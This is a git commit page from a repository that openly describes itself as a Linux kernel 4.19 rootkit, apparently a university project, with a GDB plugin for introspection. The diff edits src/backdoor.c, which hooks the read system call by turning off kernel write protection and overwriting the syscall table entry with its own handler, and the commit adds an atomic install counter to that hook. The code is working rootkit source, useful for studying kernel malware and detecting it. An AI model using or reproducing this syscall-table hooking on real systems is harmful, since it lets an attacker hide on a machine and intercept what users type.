linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit bce882ce726e6a62df78017f4cbe87fa39f00445
parent 2696bbd0c30d0ce77be9091fa85f46129f14df50
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 29 Nov 2020 17:40:59 +0100

adds install count for read hook

Diffstat:

Msrc/backdoor.c | 28+++++++++++++++++-----------


1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -16,9 +16,11 @@ int (*current_receive_buf2)(struct tty_struct *, const unsigned char *, char *, 
 void
 backdoor_read(void)
 {
-    disable_protection();
-    sys_calls[__NR_read] = (void *)g7_read;
-    enable_protection();
+    if (atomic_inc_return(&read_install_count) == 1) {
+        disable_protection();
+        sys_calls[__NR_read] = (void *)g7_read;
+        enable_protection();
+    }
 }
 
 void
@@ -54,16 +56,20 @@ unbackdoor(void)
         tty = NULL;
     }
 
-    if (sys_read) {
-        disable_protection();
-        sys_calls[__NR_read] = (void *)sys_read;
-        enable_protection();
+    if (atomic_dec_return(&read_install_count) < 0) {
+        atomic_set(&read_install_count, 0);
+
+        if (sys_read) {
+            disable_protection();
+            sys_calls[__NR_read] = (void *)sys_read;
+            enable_protection();
 
-        int cur;
+            int cur;
 
-        while ((cur = atomic_read(&read_count)) > 0) {
-            DEBUG_INFO("Waiting for %d tasks", cur);
-            msleep(250);
+            while ((cur = atomic_read(&read_count)) > 0) {
+                DEBUG_INFO("Waiting for %d tasks", cur);
+                msleep(250);
+            }
         }
     }
 }